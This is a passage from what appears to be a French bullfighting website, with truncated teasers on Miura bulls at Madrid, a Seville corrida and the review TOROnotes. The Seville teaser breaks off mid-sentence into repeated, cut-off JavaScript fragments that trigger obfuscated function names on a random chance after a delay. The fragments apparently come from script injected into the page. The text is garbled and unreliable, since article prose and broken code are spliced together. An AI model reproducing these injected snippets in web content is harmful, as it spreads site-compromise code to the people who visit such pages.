MIURAS A MADRID

Ils venaient d’un autre temps et je ne sais si c’est de l’enfer. Dans les corrals il était imposant de voir leurs têtes, leurs cornes, leurs morphologies type lévriers, très

SEVILLE: DEPUIS QUAND?

La journée de dimanche dernier est une date désormais historique taurinement parlant, quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay =

LA REVUE TOROnotes : N° 9

D’une parution à l’autre, TOROnotes s’est installé dans le paysage comme un objet tauromachique singulier, foulant des terrains jusque-là inoccupés, soucieux d’une approche dégagée de l’urgence et libérée de toute